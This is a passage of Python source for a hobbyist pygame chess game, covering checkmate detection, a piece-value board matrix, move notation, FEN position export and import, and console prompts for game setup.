if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
else:
if self.white_bishops_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.white_rooks_inf[i][2] == True:
if self.white_rooks_inf[i][0] == self.black_king_inf[0][0]:
if self.white_rooks_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_rooks_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_rooks_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.white_rooks_inf[i][1] == self.black_king_inf[0][1]:
if self.white_rooks_inf[i][0] > self.black_king_inf[0][0]:
for j in range(1, abs(self.white_rooks_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.white_rooks_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
for i in range(0, 9):
remove = True
if checkmate == False and self.white_queens_inf[i][2] == True and abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0]) == abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1]):
if self.white_queens_inf[i][0] > self.black_king_inf[0][0]:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
else:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
remove = True
if checkmate == False and self.white_queens_inf[i][2] == True:
if self.white_queens_inf[i][0] == self.black_king_inf[0][0]:
if self.white_queens_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][1] - self.black_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] and self.black_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.white_queens_inf[i][1] == self.black_king_inf[0][1]:
if self.white_queens_inf[i][0] > self.black_king_inf[0][0]:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.white_queens_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] - j and self.white_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] - j and self.black_occupation_y[k] == self.black_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
return checkmate
def convert_pieces_to_matrix(self):
self.piece_value_matrix = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
if startup.playing_as_white == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_pawns_inf[i][1]][self.white_pawns_inf[i][0]] = 1
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_bishops_inf[i][1]][self.white_bishops_inf[i][0]] = 3
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_knights_inf[i][1]][self.white_knights_inf[i][0]] = 3
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_rooks_inf[i][1]][self.white_rooks_inf[i][0]] = 5
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_queens_inf[i][1]][self.white_queens_inf[i][0]] = 9
if self.white_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.white_king_inf[0][1]][self.white_king_inf[0][0]] = 100
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_pawns_inf[i][1]][self.black_pawns_inf[i][0]] = -1
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_bishops_inf[i][1]][self.black_bishops_inf[i][0]] = -3
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_knights_inf[i][1]][self.black_knights_inf[i][0]] = -3
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_rooks_inf[i][1]][self.black_rooks_inf[i][0]] = -5
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_queens_inf[i][1]][self.black_queens_inf[i][0]] = -9
if self.black_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.black_king_inf[0][1]][self.black_king_inf[0][0]] = -100
else:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_pawns_inf[i][1]][self.white_pawns_inf[i][0]] = -1
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_bishops_inf[i][1]][self.white_bishops_inf[i][0]] = -3
for i in range(0, 10):
if self.white_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_knights_inf[i][1]][self.white_knights_inf[i][0]] = -3
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_rooks_inf[i][1]][self.white_rooks_inf[i][0]] = -5
for i in range(0, 9):
if self.white_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.white_queens_inf[i][1]][self.white_queens_inf[i][0]] = -9
if self.white_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.white_king_inf[0][1]][self.white_king_inf[0][0]] = -100
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_pawns_inf[i][1]][self.black_pawns_inf[i][0]] = 1
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_bishops_inf[i][1]][self.black_bishops_inf[i][0]] = 3
for i in range(0, 10):
if self.black_knights_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_knights_inf[i][1]][self.black_knights_inf[i][0]] = 3
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_rooks_inf[i][1]][self.black_rooks_inf[i][0]] = 5
for i in range(0, 9):
if self.black_queens_inf[i][2] == True:
self.piece_value_matrix[7 - self.black_queens_inf[i][1]][self.black_queens_inf[i][0]] = 9
if self.black_king_inf[0][2] == True:
self.piece_value_matrix[7 - self.black_king_inf[0][1]][self.black_king_inf[0][0]] = 100
def find_piece_name(self, x, y):
found = False
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == x and self.white_pawns_inf[i][1] == y:
found = True
return "P"
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == x and self.white_bishops_inf[i][1] == y:
found = True
return "B"
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == x and self.white_knights_inf[i][1] == y:
found = True
return "N"
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == x and self.white_rooks_inf[i][1] == y:
found = True
return "R"
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == x and self.white_queens_inf[i][1] == y:
found = True
return "Q"
if self.white_king_inf[0][2] == True and self.white_king_inf[0][0] == x and self.white_king_inf[0][1] == y:
found = True
return "K"
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == x and self.black_pawns_inf[i][1] == y:
found = True
return "P"
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == x and self.black_bishops_inf[i][1] == y:
found = True
return "B"
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == x and self.black_knights_inf[i][1] == y:
found = True
return "N"
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == x and self.black_rooks_inf[i][1] == y:
found = True
return "R"
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == x and self.black_queens_inf[i][1] == y:
found = True
return "Q"
if self.black_king_inf[0][2] == True and self.black_king_inf[0][0] == x and self.black_king_inf[0][1] == y:
found = True
return "K"
if found == False:
return "none"
def no_moves(self):
check_mate = self.stale_check_mate()
if check_mate == True:
if startup.white_turn == True:
print("Black wins by Checkmate!")
else:
print("White wins by Checkmate!")
else:
print("It's a draw by stalemate!")
class Notation():
def __init__(self):
pass
def get_notation(self, piece, from_x, from_y, to_x, to_y):
notation_val = "error"
capture = False
if piece == "P":
if to_y == 7 or to_y == 0:
if to_x == from_x and (to_y == from_y + 1 or to_y == from_y - 1 or to_y == from_y + 2 or to_y == from_y - 2):
notation_val = self.get_column(to_x) + self.get_row(to_y) + "="
elif (to_x == from_x + 1 or to_x == from_x - 1) and (to_y == from_y + 1 or to_y == from_y - 1):
notation_val = self.get_column(from_x) + "x" + self.get_column(to_x) + self.get_row(to_y) + "="
else:
if to_x == from_x and (to_y == from_y + 1 or to_y == from_y - 1 or to_y == from_y + 2 or to_y == from_y - 2):
notation_val = self.get_column(to_x) + self.get_row(to_y)
elif (to_x == from_x + 1 or to_x == from_x - 1) and (to_y == from_y + 1 or to_y == from_y - 1):
notation_val = self.get_column(from_x) + "x" + self.get_column(to_x) + self.get_row(to_y)
else:
if startup.white_turn == True:
for i in range(0, len(pieces.black_occupation_x)):
if to_x == pieces.black_occupation_x[i] and to_y == pieces.black_occupation_y[i]:
capture = True
else:
for i in range(0, len(pieces.white_occupation_x)):
if to_x == pieces.white_occupation_x[i] and to_y == pieces.white_occupation_y[i]:
capture = True
if capture == True:
notation_val = piece + self.get_column(from_x) + self.get_row(from_y) + "x" + self.get_column(to_x) + self.get_row(to_y)
else:
notation_val = piece + self.get_column(from_x) + self.get_row(from_y) + self.get_column(to_x) + self.get_row(to_y)
return notation_val
def get_column(self, x):
if x == 0:
return "a"
elif x == 1:
return "b"
elif x == 2:
return "c"
elif x == 3:
return "d"
elif x == 4:
return "e"
elif x == 5:
return "f"
elif x == 6:
return "g"
elif x == 7:
return "h"
def get_column_char(self, x):
if x == "a":
return 0
elif x == "b":
return 1
elif x == "c":
return 2
elif x == "d":
return 3
elif x == "e":
return 4
elif x == "f":
return 5
elif x == "g":
return 6
elif x == "h":
return 7
def get_row(self, y):
for i in range(0, 8):
if y == i:
return str(i + 1)
if y != 0 and y != 1 and y != 2 and y != 3 and y != 4 and y != 5 and y != 6 and y != 7:
return "9"
def create_fen_position(self):
fen = "11111111/11111111/11111111/11111111/11111111/11111111/11111111/11111111 w KQkq -"
if pieces.en_passant_x_y[0] != 8 and pieces.en_passant_x_y[1] != 8:
pos = 79
if startup.white_turn == True:
fen = fen[:pos] + self.get_column(pieces.en_passant_x_y[0]) + self.get_row(pieces.en_passant_x_y[1] + 1) + fen[pos + 1:]
else:
fen = fen[:pos] + self.get_column(pieces.en_passant_x_y[0]) + self.get_row(pieces.en_passant_x_y[1] - 1) + fen[pos + 1:]
if pieces.black_king_inf[0][3] == True:
black_queenside_castling = False
black_kingside_castling = False
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][3] == True and pieces.black_rooks_inf[i][0] == 0 and pieces.black_rooks_inf[i][1] == 7:
black_queenside_castling = True
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][3] == True and pieces.black_rooks_inf[i][0] == 7 and pieces.black_rooks_inf[i][1] == 7:
black_kingside_castling = True
if black_queenside_castling == False:
pos = 77
fen = fen[:pos] + fen[pos + 1:]
if black_kingside_castling == False:
pos = 76
fen = fen[:pos] + fen[pos + 1:]
else:
pos = 76
fen = fen[:pos] + fen[pos + 2:]
if pieces.white_king_inf[0][3] == True:
white_queenside_castling = False
white_kingside_castling = False
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][3] == True and pieces.white_rooks_inf[i][0] == 0 and pieces.white_rooks_inf[i][1] == 0:
white_queenside_castling = True
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][3] == True and pieces.white_rooks_inf[i][0] == 7 and pieces.white_rooks_inf[i][1] == 0:
white_kingside_castling = True
if white_queenside_castling == False:
pos = 75
fen = fen[:pos] + fen[pos + 1:]
if white_kingside_castling == False:
pos = 74
fen = fen[:pos] + fen[pos + 1:]
else:
pos = 74
if fen[76] == " ":
fen = fen[:pos] + "-" + fen[pos + 2:]
else:
fen = fen[:pos] + fen[pos + 2:]
pos = 72
if startup.white_turn == True:
fen = fen[:pos] + "w" + fen[pos + 1:]
else:
fen = fen[:pos] + "b" + fen[pos + 1:]
for i in range(0, 8):
if pieces.white_pawns_inf[i][2] == True:
pos = pieces.white_pawns_inf[i][0] + ((7 - pieces.white_pawns_inf[i][1]) * 9)
fen = fen[:pos] + "P" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_bishops_inf[i][2] == True:
pos = pieces.white_bishops_inf[i][0] + ((7 - pieces.white_bishops_inf[i][1]) * 9)
fen = fen[:pos] + "B" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_knights_inf[i][2] == True:
pos = pieces.white_knights_inf[i][0] + ((7 - pieces.white_knights_inf[i][1]) * 9)
fen = fen[:pos] + "N" + fen[pos + 1:]
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True:
pos = pieces.white_rooks_inf[i][0] + ((7 - pieces.white_rooks_inf[i][1]) * 9)
fen = fen[:pos] + "R" + fen[pos + 1:]
for i in range(0, 9):
if pieces.white_queens_inf[i][2] == True:
pos = pieces.white_queens_inf[i][0] + ((7 - pieces.white_queens_inf[i][1]) * 9)
fen = fen[:pos] + "Q" + fen[pos + 1:]
if pieces.white_king_inf[0][2] == True:
pos = pieces.white_king_inf[0][0] + ((7 - pieces.white_king_inf[0][1]) * 9)
fen = fen[:pos] + "K" + fen[pos + 1:]
for i in range(0, 8):
if pieces.black_pawns_inf[i][2] == True:
pos = pieces.black_pawns_inf[i][0] + ((7 - pieces.black_pawns_inf[i][1]) * 9)
fen = fen[:pos] + "p" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_bishops_inf[i][2] == True:
pos = pieces.black_bishops_inf[i][0] + ((7 - pieces.black_bishops_inf[i][1]) * 9)
fen = fen[:pos] + "b" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_knights_inf[i][2] == True:
pos = pieces.black_knights_inf[i][0] + ((7 - pieces.black_knights_inf[i][1]) * 9)
fen = fen[:pos] + "n" + fen[pos + 1:]
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True:
pos = pieces.black_rooks_inf[i][0] + ((7 - pieces.black_rooks_inf[i][1]) * 9)
fen = fen[:pos] + "r" + fen[pos + 1:]
for i in range(0, 9):
if pieces.black_queens_inf[i][2] == True:
pos = pieces.black_queens_inf[i][0] + ((7 - pieces.black_queens_inf[i][1]) * 9)
fen = fen[:pos] + "q" + fen[pos + 1:]
if pieces.black_king_inf[0][2] == True:
pos = pieces.black_king_inf[0][0] + ((7 - pieces.black_king_inf[0][1]) * 9)
fen = fen[:pos] + "k" + fen[pos + 1:]
pos = 0
while fen[pos] != " ":
if (fen[pos] == "1" or fen[pos] == "2" or fen[pos] == "3" or fen[pos] == "4" or fen[pos] == "5" or fen[pos] == "6" or fen[pos] == "7") and fen[pos + 1] == "1":
fen = fen[:pos] + str(int(fen[pos]) + int(fen[pos + 1])) + fen[pos + 2:]
else:
pos += 1
return fen
def load_fen_position(self, fen):
pieces.white_pawns_inf = [[0, 1, False, False], [1, 1, False, False], [2, 1, False, False], [3, 1, False, False], [4, 1, False, False], [5, 1, False, False], [6, 1, False, False], [7, 1, False, False]]
pieces.white_bishops_inf = [[2, 0, False], [5, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_knights_inf = [[1, 0, False], [6, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_rooks_inf = [[0, 0, False, False], [7, 0, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
pieces.white_queens_inf = [[3, 0, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.white_king_inf = [[4, 0, False, False]]
pieces.black_pawns_inf = [[0, 6, False, False], [1, 6, False, False], [2, 6, False, False], [3, 6, False, False], [4, 6, False, False], [5, 6, False, False], [6, 6, False, False], [7, 6, False, False]]
pieces.black_bishops_inf = [[2, 7, False], [5, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.black_knights_inf = [[6, 7, False], [1, 7, False], [6, 3, False], [0, 3, False], [2, 0, False], [2, 6, False], [6, 2, False], [0, 2, False], [0, 7, False], [0, 7, False]]
pieces.black_rooks_inf = [[0, 7, False, False], [7, 7, False, False], [2, 0, False, False], [4, 6, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False], [0, 7, False, False]]
pieces.black_queens_inf = [[3, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False], [0, 7, False]]
pieces.black_king_inf = [[4, 7, False, False]]
fen_stage = 0
x = 0
y = 7
for char in fen:
if char == " ":
fen_stage += 1
elif fen_stage == 0:
if char == "/":
x = -1
y -= 1
elif char.isnumeric():
x += int(char) - 1
elif char == "P":
count = 0
while count <= 7:
if pieces.white_pawns_inf[count][2] == False:
pieces.white_pawns_inf[count][0] = x
pieces.white_pawns_inf[count][1] = y
pieces.white_pawns_inf[count][2] = True
if y == 1:
pieces.white_pawns_inf[count][3] = True
break
else:
count += 1
elif char == "B":
count = 0
while count <= 9:
if pieces.white_bishops_inf[count][2] == False:
pieces.white_bishops_inf[count][0] = x
pieces.white_bishops_inf[count][1] = y
pieces.white_bishops_inf[count][2] = True
break
else:
count += 1
elif char == "N":
count = 0
while count <= 9:
if pieces.white_knights_inf[count][2] == False:
pieces.white_knights_inf[count][0] = x
pieces.white_knights_inf[count][1] = y
pieces.white_knights_inf[count][2] = True
break
else:
count += 1
elif char == "R":
count = 0
while count <= 9:
if pieces.white_rooks_inf[count][2] == False:
pieces.white_rooks_inf[count][0] = x
pieces.white_rooks_inf[count][1] = y
pieces.white_rooks_inf[count][2] = True
break
else:
count += 1
elif char == "Q":
count = 0
while count <= 8:
if pieces.white_queens_inf[count][2] == False:
pieces.white_queens_inf[count][0] = x
pieces.white_queens_inf[count][1] = y
pieces.white_queens_inf[count][2] = True
break
else:
count += 1
elif char == "K":
if pieces.white_king_inf[0][2] == False:
pieces.white_king_inf[0][0] = x
pieces.white_king_inf[0][1] = y
pieces.white_king_inf[0][2] = True
elif char == "p":
count = 0
while count <= 7:
if pieces.black_pawns_inf[count][2] == False:
pieces.black_pawns_inf[count][0] = x
pieces.black_pawns_inf[count][1] = y
pieces.black_pawns_inf[count][2] = True
if y == 6:
pieces.black_pawns_inf[count][3] = True
break
else:
count += 1
elif char == "b":
count = 0
while count <= 9:
if pieces.black_bishops_inf[count][2] == False:
pieces.black_bishops_inf[count][0] = x
pieces.black_bishops_inf[count][1] = y
pieces.black_bishops_inf[count][2] = True
break
else:
count += 1
elif char == "n":
count = 0
while count <= 9:
if pieces.black_knights_inf[count][2] == False:
pieces.black_knights_inf[count][0] = x
pieces.black_knights_inf[count][1] = y
pieces.black_knights_inf[count][2] = True
break
else:
count += 1
elif char == "r":
count = 0
while count <= 9:
if pieces.black_rooks_inf[count][2] == False:
pieces.black_rooks_inf[count][0] = x
pieces.black_rooks_inf[count][1] = y
pieces.black_rooks_inf[count][2] = True
break
else:
count += 1
elif char == "q":
count = 0
while count <= 8:
if pieces.black_queens_inf[count][2] == False:
pieces.black_queens_inf[count][0] = x
pieces.black_queens_inf[count][1] = y
pieces.black_queens_inf[count][2] = True
break
else:
count += 1
elif char == "k":
if pieces.black_king_inf[0][2] == False:
pieces.black_king_inf[0][0] = x
pieces.black_king_inf[0][1] = y
pieces.black_king_inf[0][2] = True
x += 1
elif fen_stage == 1:
if char == "w":
startup.white_turn = True
elif char == "b":
startup.white_turn = False
elif fen_stage == 2:
if char == "K":
pieces.white_king_inf[0][3] = True
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][0] == 7 and pieces.white_rooks_inf[i][1] == 0:
pieces.white_rooks_inf[i][3] = True
elif char == "Q":
pieces.white_king_inf[0][3] = True
for i in range(0, 10):
if pieces.white_rooks_inf[i][2] == True and pieces.white_rooks_inf[i][0] == 0 and pieces.white_rooks_inf[i][1] == 0:
pieces.white_rooks_inf[i][3] = True
elif char == "k":
pieces.black_king_inf[0][3] = True
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][0] == 7 and pieces.black_rooks_inf[i][1] == 7:
pieces.black_rooks_inf[i][3] = True
elif char == "q":
pieces.black_king_inf[0][3] = True
for i in range(0, 10):
if pieces.black_rooks_inf[i][2] == True and pieces.black_rooks_inf[i][0] == 0 and pieces.black_rooks_inf[i][1] == 7:
pieces.black_rooks_inf[i][3] = True
elif fen_stage == 3:
if char.isnumeric():
if startup.white_turn == True:
pieces.en_passant_x_y[1] = int(char) - 2
else:
pieces.en_passant_x_y[1] = int(char)
else:
pieces.en_passant_x_y[0] = self.get_column_char(char)
class Start():
def __init__(self):
root = Tk()
#width = root.winfo_screenwidth()
self.screen_height = root.winfo_screenheight() * 0.9
self.screen_height = math.trunc(self.screen_height + (self.screen_height % 8))
pygame.init()
self.screen = pygame.display.set_mode((self.screen_height, self.screen_height))
pygame.display.set_caption("Chess")
self.tile_size = self.screen_height // 8
self.run = True
self.update = False
self.white_turn = True
self.playing_as_white = True
self.auto_rotate = False
self.your_turn = True
def start(self):
self.player_customisations_thread = threading.Thread(target = self.player_customisations_func)
self.player_customisations_thread.start()
while self.run:
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.run = False
if self.update == True:
self.update = False
if self.auto_move == True:
self.auto_move_thread = threading.Thread(target = self.auto_move_func)
self.auto_move_thread.start()
elif self.one_player == True:
self.one_player_thread = threading.Thread(target = self.one_player_func)
self.one_player_thread.start()
elif self.two_player == True:
self.two_player_thread = threading.Thread(target = self.two_player_func)
self.two_player_thread.start()
pygame.quit()
def player_customisations_func(self):
board.draw_board()
pieces.draw_pieces_white()
pygame.display.update()
while True:
print("How many players? (0-2)")
player_amount = input()
try:
player_amount = int(player_amount)
if player_amount >= 0 and player_amount <= 2:
break
else:
print("That is not a valid number.")
except:
print("That is not a valid number.")
self.auto_move = False
self.one_player = False
self.two_player = False
if player_amount == 0:
self.auto_move = True
elif player_amount == 1:
self.one_player = True
while True:
print("Do you want to play as white, black or a random colour? (w/b/r)")
playing_as_input = input()
if playing_as_input == "w":
self.playing_as_white = True
break
elif playing_as_input == "b":
self.playing_as_white = False
break
elif playing_as_input == "r":
self.playing_as_white = random.choice([True, False])
break
else:
print("That is not a valid answer.")
self.your_turn = self.playing_as_white
elif player_amount == 2:
self.two_player = True
while True:
print("Do you want to rotate the board automatically? (y/n)")
board_rotate_input = input()
if board_rotate_input == "y":
self.auto_rotate = True
break
elif board_rotate_input == "n":
self.auto_rotate = False
break
else:
print("That is not a valid answer.")
while True:
print("Do you want to play from a pre-determined position? (y/n)")
predetermined_position_input = input()
if predetermined_position_input == "y":
while True:
print("Paste the fen position.")
fen_position = input()
try:
notation.load_fen_position(fen_position)
break
except:
print("That is not a valid position.")
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
pygame.display.update()
break
elif predetermined_position_input == "n":
break
else:
print("That is not a valid answer.")
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
def auto_move_func(self):
pieces.white_black_occupation()
pieces.calc_legal_moves()
pieces.check_checks()
if len(pieces.legal_moves) > 0:
time.sleep(0)
pieces.convert_pieces_to_matrix()
notation_val, take = pieces.convert_to_easy_notation(pieces.legal_moves[random.randint(0, len(pieces.legal_moves) - 1)])
pieces.move_piece(notation_val, take)
half_move_limit, check_mate = pieces.half_move_check()
if half_move_limit == True and check_mate == False:
print("It's a draw by too many moves!")
self.auto_move = False
self.white_turn = not self.white_turn
board.draw_board()
if self.playing_as_white == True:
pieces.draw_pieces_white()
else:
pieces.draw_pieces_black()
self.update = True
else:
